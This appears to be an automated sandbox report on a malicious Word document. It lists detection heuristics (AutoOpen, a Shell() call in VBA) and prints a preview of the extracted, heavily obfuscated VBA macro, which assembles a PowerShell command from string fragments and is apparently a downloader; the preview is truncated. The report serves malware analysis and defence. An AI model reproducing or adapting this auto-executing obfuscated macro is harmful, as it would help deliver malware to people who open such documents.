MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The critical heuristic firing for a Shell() call within the VBA, combined with the script's attempt to construct and execute a PowerShell command, strongly suggests a downloader or initial execution payload. The obfuscated nature of the script prevents a more precise determination of its ultimate goal.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 189234 bytes |
SHA-256: f2c8649f950a54309d809be43b0001618e22b6fd51802a07a76314f08ca928f8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HPfiIqCZCzE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BiaZiUSTfbG()
On Error Resume Next
TjaXAFJScCO = (buuTYhNRjGq - CDbl(275438) + WAsTihMYIK + Fix(YriNONHvG / CLng(387668 * Sqr(JzmTWNYuBMN))) - 425551 / Sin(kBzNpnvqqp - KWbpUwE - 498046 + CLng(KkuMDFAH)) * 474213 * Fix(275438))
bvFFFjiwVi = "UbCpiVBE7Dyowershell (('Oa0zAJX7QkjtuVmYxSCkK8(HiogLC"
jtlZtRvtR = CStr(Left(Right(bvFFFjiwVi, 43), 14)) + CStr(Left(Right(bvFFFjiwVi, 7), 1)) + Left(Right(bvFFFjiwVi, 46), 2) + CStr(Left(Right(bvFFFjiwVi, 47), 1))
kjhIBGlRo = "7hQaLnsaYcEBvogd7gTCtIT1L4F'UDICk"
TvqRNIRwZvL = CStr(Left(Right(kjhIBGlRo, 31), 6)) + Left(Right(kjhIBGlRo, 18), 2) + CStr(Left(Right(kjhIBGlRo, 4), 1)) + CStr(Left(Right(kjhIBGlRo, 23), 1)) + Left(Right(kjhIBGlRo, 6), 1)
UHJaFoOmoju = Chr(43)
Sstvzw = "'Y8"
tfTwRkWtkz = CStr(Left(Right(Sstvzw, 3), 1))
KkBEYioVj = (ZSNWFVGcuL - CDbl(560944) + rYGOHG + Fix(jwZQNFnRmP / CLng(889142 * Sqr(MNDQV))) - 43562 / Sin(FYBYuL - LURSLupQb - 481550 + CLng(phQIE)) * 948300 * Fix(560944))
nnnmBYck = Chr(43)
sKQStT = "vgN7DEasd = grR7TCtIT1&(FUUDICkw1EpLPUSDPCzKBQrG"
kEUjSX = CStr(Left(Right(sKQStT, 45), 9)) + CStr(Left(Right(sKQStT, 26), 2)) + CStr(Left(Right(sKQStT, 6), 1)) + Left(Right(sKQStT, 34), 2) + CStr(Left(Right(sKQStT, 9), 1)) + CStr(Left(Right(sKQStT, 15), 1))
jEQEwnUco = Chr(43)
amkCmL = "Q7DE7nNE7OY7mBvogr0gTDtI"
VtdZjKkd = Left(Right(amkCmL, 23), 5) + Left(Right(amkCmL, 13), 1) + Left(Right(amkCmL, 3), 1) + Left(Right(amkCmL, 17), 1)
bzSKzaCjHh = (tjFPN - CDbl(274567) + RkmGDKt + Fix(ztQCdCHwv / CLng(382293 * Sqr(DqEQt))) - 574199 / Sin(OmvXBFap - iFoZiYpZ - 960787 + CLng(wjljdfwu)) * 888394 * Fix(274567))
jiRwnnzTVL = Chr(43)
HYDfIpw = "Q7DEzgEu77YcmBvogrDgT"
EQrXNEEk = Left(Right(HYDfIpw, 20), 4) + CStr(Left(Right(HYDfIpw, 12), 1)) + Left(Right(HYDfIpw, 3), 1) + Left(Right(HYDfIpw, 15), 1)
SpjspYksT = Chr(43)
jmNLnjCl = "7DEKQq'hvgNu"
OwjCv = Left(Right(jmNLnjCl, 12), 3) + Left(Right(jmNLnjCl, 6), 1)
tuYGPDGA = (zcVNwC - CDbl(714926) + sTwMZ + Fix(BdndXMVS / CLng(768947 * Sqr(JhfCak))) - 368832 / Sin(WkNsA - nhhQdtvmq - 865153 + CLng(wTtvTljtiv)) * 301862 * Fix(714926))
UqziScWEov = Chr(43)
UTRooJzKiDC = "H'R77hvDNu7OYEm"
MBYcK = Left(Right(UTRooJzKiDC, 14), 3) + CStr(Left(Right(UTRooJzKiDC, 8), 1)) + CStr(Left(Right(UTRooJzKiDC, 2), 1))
GTrOQ = Chr(43)
ZXobs = "7DEKQq7hvgNu"
wUCqiPVoKFI = Left(Right(ZXobs, 12), 3) + Left(Right(ZXobs, 6), 1)
PwcItovkKj = Chr(43)
COPvK = "7hzR7ezODcmBRogr0gTCtIE7L4F"
rQwmDjqBYE = Left(Right(COPvK, 25), 5) + Left(Right(COPvK, 15), 1) + Left(Right(COPvK, 4), 1) + Left(Right(COPvK, 19), 1) + Left(Right(COPvK, 5), 1)
BiaZiUSTfbG = jtlZtRvtR + TvqRNIRwZvL + UHJaFoOmoju + tfTwRkWtkz + nnnmBYck + kEUjSX + jEQEwnUco + VtdZjKkd + jiRwnnzTVL + EQrXNEEk + SpjspYksT + OwjCv + UqziScWEov + MBYcK + GTrOQ + wUCqiPVoKFI + PwcItovkKj + rQwmDjqBYE
End Function
Function wKPmnoSGpG()
On Error Resume Next
knYzS = (HAHRDujzklY - CDbl(574423) + iRzFYCjj + Fix(MELBw / CLng(953564 * Sqr(CHtoQLE))) - 492814 / Sin(DLNkUtM - zErZCGiOWN - 70674 + CLng(ovvvQFYjrq)) * 364235 * Fix(574423))
dTAXnczPjmR = Chr(43)
znDiRMSwC = "7DEKQq7hvgNu"
uoKlnvYDszm = Left(Right(znDiRMSwC, 12), 3) + Left(Right(znDiRMSwC, 6), 1)
QuAcmEDsbmw = Chr(43)
PVKiRzUIf = "HzR77hvDNu7OYEm"
HRiCa = Left(Right(PVKiRzUIf, 14), 3) + CStr(Left(Right(PVKiRzUIf, 8), 1)) + CStr(Left(Right(PVKiRzUIf, 2), 1))
RvLjJB = Chr(43)
zIJhYqFEVd = "Q7DE7gEu77YcmBvogrDgT"
jwVbJCjhAG = Left(Right(zIJhYqFEVd, 20), 4) + CStr(Left(Right(zIJhYqFEVd, 12), 1)) + Left(Right(zIJhYqFEVd, 3), 1) + Left(Right(zIJhYqFEVd, 15), 1)
cVdfiZRHqEi = Chr(43)
zXbVlOpaV = "vgN7DEw-objog70gTCtec1L4FUUDECkw1DpLPzS2PC"
RWchfrn = CStr(Left(Right(zXbVlOpaV, 39), 8)) + Left(Right(zXbVlOpaV, 23), 2) + Left(Right(zXbVlOpaV, 5), 1) + Left(Right(zXbVlOpaV, 29), 1) + CStr(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.